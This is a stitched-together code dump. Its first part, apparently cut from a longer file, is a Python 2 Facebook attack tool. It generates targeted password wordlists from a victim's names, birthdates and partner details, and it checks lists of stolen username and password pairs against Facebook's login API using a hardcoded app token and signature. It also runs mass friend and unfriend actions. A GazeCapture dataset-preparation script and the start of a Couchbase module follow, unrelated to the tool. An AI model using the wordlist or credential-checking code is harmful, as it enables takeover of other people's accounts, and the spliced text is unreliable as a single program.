print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
limit = raw_input('\x1b[1;91m[!] \x1b[1;92mLimit \x1b[1;91m:\x1b[1;97m ')
r = requests.get('https://graph.facebook.com/me/friendrequests?limit=' + limit + '&access_token=' + toket)
friends = json.loads(r.text)
if '[]' in str(friends['data']):
print '\x1b[1;91m[!] No friends request'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu_bot()
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mPlease wait \x1b[1;97m...')
print 52 * '\x1b[1;97m\xe2\x95\x90'
for i in friends['data']:
gas = requests.post('https://graph.facebook.com/me/friends/' + i['from']['id'] + '?access_token=' + toket)
a = json.loads(gas.text)
if 'error' in str(a):
print '\x1b[1;91m[+] \x1b[1;92mName \x1b[1;91m:\x1b[1;97m ' + i['from']['name']
print '\x1b[1;91m[+] \x1b[1;92mID \x1b[1;91m:\x1b[1;97m ' + i['from']['id'] + '\x1b[1;91m Failed'
print 52 * '\x1b[1;97m\xe2\x95\x90'
else:
print '\x1b[1;91m[+] \x1b[1;92mName \x1b[1;91m:\x1b[1;97m ' + i['from']['name']
print '\x1b[1;91m[+] \x1b[1;92mID \x1b[1;91m:\x1b[1;97m ' + i['from']['id'] + '\x1b[1;92m Berhasil'
print 52 * '\x1b[1;97m\xe2\x95\x90'
print '\n\x1b[1;91m[+] \x1b[1;97mFinish'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu_bot()
def unfriend():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(1)
login()
else:
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mPlease wait \x1b[1;97m...')
print 52 * '\x1b[1;97m\xe2\x95\x90'
print '\x1b[1;97mStop \x1b[1;91mCTRL+C'
print
try:
pek = requests.get('https://graph.facebook.com/me/friends?access_token=' + toket)
cok = json.loads(pek.text)
for i in cok['data']:
nama = i['name']
id = i['id']
requests.delete('https://graph.facebook.com/me/friends?uid=' + id + '&access_token=' + toket)
print '\x1b[1;97m[\x1b[1;92mRemove\x1b[1;97m] ' + nama + ' => ' + id
except IndexError:
pass
except KeyboardInterrupt:
print '\x1b[1;91m[!] Stopped'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu_bot()
print '\n\x1b[1;91m[+] \x1b[1;97mFinish'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu_bot()
def lain():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(1)
login()
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
print '║-> \x1b[1;37;40m1. Write Status'
print '║-> \x1b[1;37;40m2. Make Wordlist'
print '║-> \x1b[1;37;40m3. Account Checker'
print '║-> \x1b[1;37;40m4. List Group'
print '║-> \x1b[1;37;40m5. Profile Guard'
print '║-> \x1b[1;31;40m0. Back'
print '\x1b[1;37;40m║'
pilih_lain()
def pilih_lain():
other = raw_input('╚═\x1b[1;91m▶\x1b[1;97m ')
if other == '':
print '\x1b[1;91m[!] Can\'t empty'
pilih_lain()
else:
if other == '1':
status()
else:
if other == '2':
wordlist()
else:
if other == '3':
check_akun()
else:
if other == '4':
grupsaya()
else:
if other == '5':
guard()
else:
if other == '0':
menu()
else:
print '\x1b[1;91m[\xe2\x9c\x96] \x1b[1;97m' + other + ' \x1b[1;91mnot found'
pilih_lain()
def status():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(1)
login()
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
msg = raw_input('\x1b[1;91m[+] \x1b[1;92mWrite status \x1b[1;91m:\x1b[1;97m ')
if msg == '':
print '\x1b[1;91m[!] Can\'t empty'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
lain()
else:
res = requests.get('https://graph.facebook.com/me/feed?method=POST&message=' + msg + '&access_token=' + toket)
op = json.loads(res.text)
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mPlease wait \x1b[1;97m...')
print 52 * '\x1b[1;97m\xe2\x95\x90'
print '\x1b[1;91m[+] \x1b[1;92mStatus ID\x1b[1;91m : \x1b[1;97m' + op['id']
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
lain()
def wordlist():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(1)
login()
else:
try:
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
print '\x1b[1;91m[?] \x1b[1;92mIsi data lengkap target dibawah'
print 52 * '\x1b[1;97m\xe2\x95\x90'
a = raw_input('\x1b[1;91m[+] \x1b[1;92mName Depan \x1b[1;97m: ')
file = open(a + '.txt', 'w')
b = raw_input('\x1b[1;91m[+] \x1b[1;92mName Tengah \x1b[1;97m: ')
c = raw_input('\x1b[1;91m[+] \x1b[1;92mName Belakang \x1b[1;97m: ')
d = raw_input('\x1b[1;91m[+] \x1b[1;92mName Panggilan \x1b[1;97m: ')
e = raw_input('\x1b[1;91m[+] \x1b[1;92mTanggal Lahir >\x1b[1;96mex: |DDMMYY| \x1b[1;97m: ')
f = e[0:2]
g = e[2:4]
h = e[4:]
print 52 * '\x1b[1;97m\xe2\x95\x90'
print '\x1b[1;91m[?] \x1b[1;93mKalo Jomblo SKIP aja :v'
i = raw_input('\x1b[1;91m[+] \x1b[1;92mName Pacar \x1b[1;97m: ')
j = raw_input('\x1b[1;91m[+] \x1b[1;92mName Panggilan Pacar \x1b[1;97m: ')
k = raw_input('\x1b[1;91m[+] \x1b[1;92mTanggal Lahir Pacar >\x1b[1;96mex: |DDMMYY| \x1b[1;97m: ')
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mPlease wait \x1b[1;97m...')
l = k[0:2]
m = k[2:4]
n = k[4:]
file.write('%s%s\n%s%s%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s%s\n%s%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s%s\n%s%s%s\n%s%s%s\n%s%s%s\n%s%s%s\n%s%s%s\n%s%s%s\n%s%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s' % (a, c, a, b, b, a, b, c, c, a, c, b, a, a, b, b, c, c, a, d, b, d, c, d, d, d, d, a, d, b, d, c, a, e, a, f, a, g, a, h, b, e, b, f, b, g, b, h, c, e, c, f, c, g, c, h, d, e, d, f, d, g, d, h, e, a, f, a, g, a, h, a, e, b, f, b, g, b, h, b, e, c, f, c, g, c, h, c, e, d, f, d, g, d, h, d, d, d, a, f, g, a, g, h, f, g, f, h, f, f, g, f, g, h, g, g, h, f, h, g, h, h, h, g, f, a, g, h, b, f, g, b, g, h, c, f, g, c, g, h, d, f, g, d, g, h, a, i, a, j, a, k, i, e, i, j, i, k, b, i, b, j, b, k, c, i, c, j, c, k, e, k, j, a, j, b, j, c, j, d, j, j, k, a, k, b, k, c, k, d, k, k, i, l, i, m, i, n, j, l, j, m, j, n, j, k))
wg = 0
while wg < 100:
wg = wg + 1
file.write(a + str(wg) + '\n')
en = 0
while en < 100:
en = en + 1
file.write(i + str(en) + '\n')
word = 0
while word < 100:
word = word + 1
file.write(d + str(word) + '\n')
gen = 0
while gen < 100:
gen = gen + 1
file.write(j + str(gen) + '\n')
file.close()
time.sleep(1.5)
print '\n\x1b[1;91m[+] \x1b[1;97mSaved \x1b[1;91m: \x1b[1;97m %s.txt' % a
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
lain()
except IOError as e:
print '\x1b[1;91m[!] Make file failed'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
lain()
def check_akun():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(1)
login()
else:
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
print '\x1b[1;91m[?] \x1b[1;92mIsi File\x1b[1;91m : \x1b[1;97musername|password'
print 52 * '\x1b[1;97m\xe2\x95\x90'
live = []
cek = []
die = []
try:
file = raw_input('\x1b[1;91m[+] \x1b[1;92mFile \x1b[1;91m:\x1b[1;97m ')
list = open(file, 'r').readlines()
except IOError:
print '\x1b[1;91m[!] File not found'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
lain()
pemisah = raw_input('\x1b[1;91m[+] \x1b[1;92mSeparator \x1b[1;91m:\x1b[1;97m ')
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mPlease wait \x1b[1;97m...')
print 52 * '\x1b[1;97m\xe2\x95\x90'
for meki in list:
username, password = meki.strip().split(str(pemisah))
url = 'https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email=' + username + '&locale=en_US&password=' + password + '&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6'
data = requests.get(url)
mpsh = json.loads(data.text)
if 'access_token' in mpsh:
live.append(password)
print '\x1b[1;97m[\x1b[1;92mLive\x1b[1;97m] \x1b[1;97m' + username + ' | ' + password
elif 'www.facebook.com' in mpsh['error_msg']:
cek.append(password)
print '\x1b[1;97m[\x1b[1;93mCheck\x1b[1;97m] \x1b[1;97m' + username + ' | ' + password
else:
die.append(password)
print '\x1b[1;97m[\x1b[1;91mDie\x1b[1;97m] \x1b[1;97m' + username + ' | ' + password
print '\n\x1b[1;91m[+] \x1b[1;97mTotal\x1b[1;91m : \x1b[1;97mLive=\x1b[1;92m' + str(len(live)) + ' \x1b[1;97mCheck=\x1b[1;93m' + str(len(cek)) + ' \x1b[1;97mDie=\x1b[1;91m' + str(len(die))
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
lain()
def grupsaya():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(1)
login()
else:
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mPlease wait \x1b[1;97m...')
print 52 * '\x1b[1;97m\xe2\x95\x90'
try:
uh = requests.get('https://graph.facebook.com/me/groups?access_token=' + toket)
gud = json.loads(uh.text)
for p in gud['data']:
nama = p['name']
id = p['id']
f = open('grupid.txt', 'w')
listgrup.append(id)
f.write(id + '\n')
print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mName \x1b[1;91m:\x1b[1;97m ' + str(nama)
print '\x1b[1;91m[+] \x1b[1;92mID \x1b[1;91m:\x1b[1;97m ' + str(id)
print 52 * '\x1b[1;97m='
print '\n\r\x1b[1;91m[+] \x1b[1;97mTotal Group \x1b[1;96m%s' % len(listgrup)
print '\x1b[1;91m[+] \x1b[1;97mSaved \x1b[1;91m: \x1b[1;97mgrupid.txt'
f.close()
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
lain()
except (KeyboardInterrupt, EOFError):
print '\x1b[1;91m[!] Stopped'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
lain()
except KeyError:
os.remove('grupid.txt')
print '\x1b[1;91m[!] Group not found'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
lain()
except requests.exceptions.ConnectionError:
print '\x1b[1;91m[\xe2\x9c\x96] No connection'
keluar()
except IOError:
print '\x1b[1;91m[!] Error when creating file'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
lain()
def guard():
global toket
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(1)
login()
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
print '║-> \x1b[1;37;40m1. Enable'
print '║-> \x1b[1;37;40m2. Disable'
print '║-> \x1b[1;31;40m0. Back'
print '\x1b[1;37;40m║'
g = raw_input('╚═\x1b[1;91m▶\x1b[1;97m ')
if g == '1':
aktif = 'true'
gaz(toket, aktif)
else:
if g == '2':
non = 'false'
gaz(toket, non)
else:
if g == '0':
lain()
else:
if g == '':
keluar()
else:
keluar()
def get_userid(toket):
url = 'https://graph.facebook.com/me?access_token=%s' % toket
res = requests.get(url)
uid = json.loads(res.text)
return uid['id']
def gaz(toket, enable=True):
id = get_userid(toket)
data = 'variables={"0":{"is_shielded": %s,"session_id":"9b78191c-84fd-4ab6-b0aa-19b39f04a6bc","actor_id":"%s","client_mutation_id":"b0316dd6-3fd6-4beb-aed4-bb29c5dc64b0"}}&method=post&doc_id=1477043292367183&query_name=IsShieldedSetMutation&strip_defaults=true&strip_nulls=true&locale=en_US&client_country_code=US&fb_api_req_friendly_name=IsShieldedSetMutation&fb_api_caller_class=IsShieldedSetMutation' % (enable, str(id))
headers = {'Content-Type': 'application/x-www-form-urlencoded', 'Authorization': 'OAuth %s' % toket}
url = 'https://graph.facebook.com/graphql'
res = requests.post(url, data=data, headers=headers)
print res.text
if '"is_shielded":true' in res.text:
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mActivated'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
lain()
else:
if '"is_shielded":false' in res.text:
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;91mDeactivated'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
lain()
else:
print '\x1b[1;91m[!] Error'
keluar()
if __name__ == '__main__':
login()
|
prepareDataset.py | import math, shutil, os, time, argparse, json, re, sys
import numpy as np
import scipy.io as sio
from PIL import Image
import multiprocessing
from multiprocessing import Queue
from operator import itemgetter
import pprint as pp
'''
Prepares the GazeCapture dataset for use with the pytorch code. Crops images, compiles JSONs into metadata.mat
Author: Petr Kellnhofer ( pkel_lnho (at) gmai_l.com // remove underscores and spaces), 2018.
Website: http://gazecapture.csail.mit.edu/
Cite:
Eye Tracking for Everyone
K.Krafka*, A. Khosla*, P. Kellnhofer, H. Kannan, S. Bhandarkar, W. Matusik and A. Torralba
IEEE Conference on Computer Vision and Pattern Recognition (CVPR), 2016
@inproceedings{cvpr2016_gazecapture,
Author = {Kyle Krafka and Aditya Khosla and Petr Kellnhofer and Harini Kannan and Suchendra Bhandarkar and Wojciech Matusik and Antonio Torralba},
Title = {Eye Tracking for Everyone},
Year = {2016},
Booktitle = {IEEE Conference on Computer Vision and Pattern Recognition (CVPR)}
}
'''
# Command-line interface.
# BUGFIX: the flag was declared as --num_jobs (stored on args.num_jobs), but
# the rest of the script reads `args.jobs`, which raised AttributeError at
# runtime.  `dest='jobs'` keeps the public flag name while storing the value
# under the attribute the code actually uses.  `type=int` is also required:
# argparse yields strings by default, which would break the `args.jobs <= 0`
# comparison and the chunk-splitting arithmetic in main().
parser = argparse.ArgumentParser(description='iTracker-pytorch-PrepareDataset.')
parser.add_argument('--dataset_path', help="Path to extracted files. It should have folders called '%%05d' in it.")
parser.add_argument('--output_path', default=None, help="Where to write the output. Can be the same as dataset_path if you wish (=default).")
parser.add_argument('--num_jobs', dest='jobs', type=int, default=15, help="Number of separate processes to spawn to parallelize processing. Default=15")
args = parser.parse_args()

# Process-safe queue through which worker processes hand their metadata back
# to the parent; g_meta/g_meta_list accumulate the merged results.
g_meta_queue = Queue()
g_meta_list = []
g_meta = {
    'labelRecNum': [],
    'frameIndex': [],
    'labelDotXCam': [],
    'labelDotYCam': [],
    'labelFaceGrid': [],
}
def process_recording(recordings, thread_id):
    """Process a chunk of GazeCapture recordings in one worker.

    For each recording directory: read the annotation JSONs, crop the face
    and both eye patches from every valid frame, save the crops under the
    output tree, and collect the per-frame labels.

    Returns a dict of parallel lists ('labelRecNum', 'frameIndex',
    'labelDotXCam', 'labelDotYCam', 'labelFaceGrid') with one entry per
    successfully processed frame.

    NOTE(review): relies on module-level helpers defined elsewhere in this
    file (readJson, preparePath, cropImage, logError) and on the global
    `args` parsed at import time.
    """
    # Output structure: parallel label lists, appended to frame by frame.
    meta = {
        'labelRecNum': [],
        'frameIndex': [],
        'labelDotXCam': [],
        'labelDotYCam': [],
        'labelFaceGrid': [],
    }
    for i,recording in enumerate(recordings):
        print('[%d/%d] Thread %d Processing recording %s (%.2f%%)' % (i, len(recordings), thread_id, recording, i / len(recordings) * 100))
        recDir = os.path.join(args.dataset_path, recording)
        recDirOut = os.path.join(args.output_path, recording)
        # Read JSONs; the whole recording is skipped when any annotation
        # file is absent/unreadable (readJson presumably returns None then
        # -- TODO confirm, helper not visible in this chunk).
        appleFace = readJson(os.path.join(recDir, 'appleFace.json'))
        if appleFace is None:
            continue
        appleLeftEye = readJson(os.path.join(recDir, 'appleLeftEye.json'))
        if appleLeftEye is None:
            continue
        appleRightEye = readJson(os.path.join(recDir, 'appleRightEye.json'))
        if appleRightEye is None:
            continue
        dotInfo = readJson(os.path.join(recDir, 'dotInfo.json'))
        if dotInfo is None:
            continue
        faceGrid = readJson(os.path.join(recDir, 'faceGrid.json'))
        if faceGrid is None:
            continue
        frames = readJson(os.path.join(recDir, 'frames.json'))
        if frames is None:
            continue
        # info = readJson(os.path.join(recDir, 'info.json'))
        # if info is None:
        #     continue
        # screen = readJson(os.path.join(recDir, 'screen.json'))
        # if screen is None:
        #     continue
        # Output directories for the three crop types.
        facePath = preparePath(os.path.join(recDirOut, 'appleFace'))
        leftEyePath = preparePath(os.path.join(recDirOut, 'appleLeftEye'))
        rightEyePath = preparePath(os.path.join(recDirOut, 'appleRightEye'))
        # Preprocess: a frame is usable only when face, both eyes, and the
        # face grid are all flagged valid by the dataset annotations.
        allValid = np.logical_and(np.logical_and(appleFace['IsValid'], appleLeftEye['IsValid']), np.logical_and(appleRightEye['IsValid'], faceGrid['IsValid']))
        if not np.any(allValid):
            continue
        # frames.json lists file names like '00012.jpg'; keep the numeric
        # index.  NOTE(review): re.match returns None on an unexpected name,
        # which would raise AttributeError here.
        frames = np.array([int(re.match('(\d{5})\.jpg$', x).group(1)) for x in frames])
        # Stack the X/Y/W/H columns of a JSON bbox record into an (N, 4)
        # integer array, one row per frame.
        bboxFromJson = lambda data: np.stack((data['X'], data['Y'], data['W'],data['H']), axis=1).astype(int)
        faceBbox = bboxFromJson(appleFace) + [-1,-1,1,1] # for compatibility with matlab code
        leftEyeBbox = bboxFromJson(appleLeftEye) + [0,-1,0,0]
        rightEyeBbox = bboxFromJson(appleRightEye) + [0,-1,0,0]
        leftEyeBbox[:,:2] += faceBbox[:,:2] # relative to face
        rightEyeBbox[:,:2] += faceBbox[:,:2]
        faceGridBbox = bboxFromJson(faceGrid)
        for j,frame in enumerate(frames):
            # Can we use it?
            if not allValid[j]:
                continue
            # Load image
            imgFile = os.path.join(recDir, 'frames', '%05d.jpg' % frame)
            if not os.path.isfile(imgFile):
                logError('Warning: Could not read image file %s!' % imgFile)
                continue
            img = Image.open(imgFile)
            if img is None:
                logError('Warning: Could not read image file %s!' % imgFile)
                continue
            img = np.array(img.convert('RGB'))
            # Crop images
            imFace = cropImage(img, faceBbox[j,:])
            imEyeL = cropImage(img, leftEyeBbox[j,:])
            imEyeR = cropImage(img, rightEyeBbox[j,:])
            # Save images
            Image.fromarray(imFace).save(os.path.join(facePath, '%05d.jpg' % frame), quality=95)
            Image.fromarray(imEyeL).save(os.path.join(leftEyePath, '%05d.jpg' % frame), quality=95)
            Image.fromarray(imEyeR).save(os.path.join(rightEyePath, '%05d.jpg' % frame), quality=95)
            # Collect metadata.  Recording folder names are zero-padded
            # integers, so the record number is just int(recording).
            meta['labelRecNum'] += [int(recording)]
            meta['frameIndex'] += [frame]
            meta['labelDotXCam'] += [dotInfo['XCam'][j]]
            meta['labelDotYCam'] += [dotInfo['YCam'][j]]
            meta['labelFaceGrid'] += [faceGridBbox[j,:]]
    return meta
def run_process(thread_id, name, recordings):
    """Worker entry point for one process.

    Processes a contiguous chunk of the sorted recordings and pushes the
    resulting metadata onto the shared thread-safe queue, tagged with the
    worker's id so the parent can restore ordering later.
    """
    print("Starting " + name)
    result = process_recording(recordings, thread_id)
    # Tag with thread_id so the consumer can sort results back into order.
    g_meta_queue.put((thread_id, result))
    print("{} finished. Processed {} recordings".format(name, len(recordings)))
def split(a, n):
    """Partition sequence ``a`` into ``n`` contiguous chunks.

    Chunk sizes differ by at most one; the first ``len(a) % n`` chunks get
    the extra element. Returns a generator of slices of ``a``.
    """
    base, extra = divmod(len(a), n)
    return (a[i * base + min(i, extra):(i + 1) * base + min(i + 1, extra)]
            for i in range(n))
def main():
    """Drive the whole dataset preparation pipeline.

    Splits the recordings across worker processes, collects their metadata,
    compares the result against the reference GitHub metadata.mat, copies the
    train/val/test split from it, and writes metadata.mat to the output path.

    Fix: ``np.object`` and ``np.bool`` were removed in NumPy 1.24 — replaced
    with the builtin ``object`` / ``bool`` (identical dtypes).
    """
    if args.output_path is None:
        args.output_path = args.dataset_path
    if args.dataset_path is None or not os.path.isdir(args.dataset_path):
        raise RuntimeError('No such dataset folder %s!' % args.dataset_path)
    if args.jobs <= 0:
        args.jobs = 15  # default degree of parallelism
    preparePath(args.output_path)
    # List recordings (only subdirectories of the dataset folder).
    recordings = os.listdir(args.dataset_path)
    recordings = np.array(recordings, object)
    recordings = recordings[[os.path.isdir(os.path.join(args.dataset_path, r)) for r in recordings]]
    recordings.sort()
    # Split recordings into approximately equal sized chunks for each worker.
    chunked_recordings = list(split(recordings, args.jobs))
    processes = []
    pp.pprint(chunked_recordings)
    num_processes = 0
    for i, recording in enumerate(chunked_recordings):
        # Start parallel processes.
        name = "Thread " + str(i)
        p = multiprocessing.Process(target=run_process, args=(i, name, recording))
        processes.append((i, p))
        p.start()
        num_processes += 1
    # Drain the result queue until every worker has reported.
    meta_list = []
    num_processes_remaining = int(num_processes)
    while num_processes_remaining > 0:
        while not g_meta_queue.empty():
            meta_list.append(g_meta_queue.get())
            num_processes_remaining -= 1
            print("{} processes remaining".format(num_processes_remaining))
        time.sleep(5)
    for p_tup in processes:
        p_id, p = p_tup
        p.join()
        print("Joined process {}".format(p_id))
    # Sort meta_list in order of thread id (so lower thread num comes first).
    meta_list.sort(key=itemgetter(0))
    for item in meta_list:
        thread_id, meta = item
        for key in meta:
            g_meta[key] += meta[key]
    print("Created g_meta database")
    # Integrate per-frame lists into flat arrays.
    g_meta['labelRecNum'] = np.stack(g_meta['labelRecNum'], axis=0).astype(np.int16)
    g_meta['frameIndex'] = np.stack(g_meta['frameIndex'], axis=0).astype(np.int32)
    g_meta['labelDotXCam'] = np.stack(g_meta['labelDotXCam'], axis=0)
    g_meta['labelDotYCam'] = np.stack(g_meta['labelDotYCam'], axis=0)
    g_meta['labelFaceGrid'] = np.stack(g_meta['labelFaceGrid'], axis=0).astype(np.uint8)
    # Load reference metadata.
    print('Will compare to the reference GitHub dataset metadata.mat...')
    reference = sio.loadmat('./reference_metadata.mat', struct_as_record=False)
    reference['labelRecNum'] = reference['labelRecNum'].flatten()
    reference['frameIndex'] = reference['frameIndex'].flatten()
    reference['labelDotXCam'] = reference['labelDotXCam'].flatten()
    reference['labelDotYCam'] = reference['labelDotYCam'].flatten()
    reference['labelTrain'] = reference['labelTrain'].flatten()
    reference['labelVal'] = reference['labelVal'].flatten()
    reference['labelTest'] = reference['labelTest'].flatten()
    # Find mapping between our frames and the reference frames via rec_frame keys.
    mKey = np.array(['%05d_%05d' % (rec, frame) for rec, frame in zip(g_meta['labelRecNum'], g_meta['frameIndex'])], object)
    rKey = np.array(['%05d_%05d' % (rec, frame) for rec, frame in zip(reference['labelRecNum'], reference['frameIndex'])], object)
    mIndex = {k: i for i, k in enumerate(mKey)}
    rIndex = {k: i for i, k in enumerate(rKey)}
    mToR = np.zeros(len(mKey), int) - 1  # -1 marks "no match"
    for i, k in enumerate(mKey):
        if k in rIndex:
            mToR[i] = rIndex[k]
        else:
            logError('Did not find rec_frame %s from the new dataset in the reference dataset!' % k)
    rToM = np.zeros(len(rKey), int) - 1
    for i, k in enumerate(rKey):
        if k in mIndex:
            rToM[i] = mIndex[k]
        else:
            logError('Did not find rec_frame %s from the reference dataset in the new dataset!' % k, critical=False)
    # Copy split from reference; unmatched frames default to validation.
    g_meta['labelTrain'] = np.zeros(len(g_meta['labelRecNum']), bool)
    g_meta['labelVal'] = np.ones(len(g_meta['labelRecNum']), bool)  # default choice
    g_meta['labelTest'] = np.zeros(len(g_meta['labelRecNum']), bool)
    validMappingMask = mToR >= 0
    g_meta['labelTrain'][validMappingMask] = reference['labelTrain'][mToR[validMappingMask]]
    g_meta['labelVal'][validMappingMask] = reference['labelVal'][mToR[validMappingMask]]
    g_meta['labelTest'][validMappingMask] = reference['labelTest'][mToR[validMappingMask]]
    # Write out metadata.
    metaFile = os.path.join(args.output_path, 'metadata.mat')
    print('Writing out the metadata.mat to %s...' % metaFile)
    sio.savemat(metaFile, g_meta)
    # Statistics.
    nMissing = np.sum(rToM < 0)
    nExtra = np.sum(mToR < 0)
    totalMatch = len(mKey) == len(rKey) and np.all(np.equal(mKey, rKey))
    print('======================\n\tSummary\n======================')
    print('Total added %d frames from %d recordings.' % (len(g_meta['frameIndex']), len(np.unique(g_meta['labelRecNum']))))
    if nMissing > 0:
        print('There are %d frames missing in the new dataset. This may affect the results. Check the log to see which files are missing.' % nMissing)
    else:
        print('There are no missing files.')
    if nExtra > 0:
        print('There are %d extra frames in the new dataset. This is generally ok as they were marked for validation split only.' % nExtra)
    else:
        print('There are no extra files that were not in the reference dataset.')
    if totalMatch:
        print('The new metadata.mat is an exact match to the reference from GitHub (including ordering)')
    input("Press Enter to continue...")
def readJson(filename):
    """Read a JSON file and return the parsed data, or None on any failure.

    Logs a (non-critical) warning when the file is missing or unreadable.
    Fix: the bare ``except:`` also swallowed KeyboardInterrupt/SystemExit;
    narrowed to the exceptions file reading and JSON parsing can raise.
    """
    if not os.path.isfile(filename):
        logError('Warning: No such file %s!' % filename)
        return None
    with open(filename) as f:
        try:
            data = json.load(f)
        except (ValueError, OSError, UnicodeDecodeError):
            # ValueError covers json.JSONDecodeError (its subclass).
            data = None
    if data is None:
        logError('Warning: Could not read file %s!' % filename)
        return None
    return data
def preparePath(path, clear = False):
    """Ensure directory ``path`` exists; optionally empty it.

    When ``clear`` is true, every file and subdirectory inside ``path`` is
    removed. Returns ``path`` unchanged for call chaining.
    """
    if not os.path.isdir(path):
        os.makedirs(path, 0o777)
    if clear:
        for entry in os.listdir(path):
            full = os.path.join(path, entry)
            if os.path.isdir(full):
                shutil.rmtree(full)
            else:
                os.remove(full)
    return path
def logError(msg, critical = False):
    """Print a diagnostic message; abort the process when ``critical``."""
    print(msg)
    if not critical:
        return
    sys.exit(1)
def cropImage(img, bbox):
    """Crop ``bbox`` = [x, y, w, h] from an HxWxC image, zero-padding any
    part of the box that falls outside the image bounds.

    Returns a new array of shape (h, w, C) with the same dtype as ``img``.
    """
    bbox = np.array(bbox, int)
    # Clamp the source rectangle to the image extents.
    src_lo = np.maximum(bbox[:2], 0)
    src_hi = np.minimum(bbox[:2] + bbox[2:], (img.shape[1], img.shape[0]))
    # Destination offset mirrors how much of the box was clipped.
    dst_lo = src_lo - bbox[:2]
    dst_hi = dst_lo + (src_hi - src_lo)
    out = np.zeros((bbox[3], bbox[2], img.shape[2]), img.dtype)
    out[dst_lo[1]:dst_hi[1], dst_lo[0]:dst_hi[0], :] = \
        img[src_lo[1]:src_hi[1], src_lo[0]:src_hi[0], :]
    return out
# Script entry point: runs the full dataset-preparation pipeline (see main()).
if __name__ == "__main__":
    main()
    print('DONE')
|
pump_sfd.py | #!/usr/bin/env python3
import glob
import json
import logging
import os
import queue
import re
import struct
import threading
from collections import defaultdict
from typing import Any, Dict, List, Optional, Tuple
import couchstore # pylint: disable=import-error
import couchbaseConstants
import pump
from cb_bin_client import decode_collection_id, encode_collection_id
# Spec prefix recognized by SFDSource/SFDSink.
SFD_SCHEME = "couchstore-files://"
# Number of vbuckets in a couchbase bucket's data directory.
SFD_VBUCKETS = 1024
# Binary layouts (big-endian) for document revision metadata.
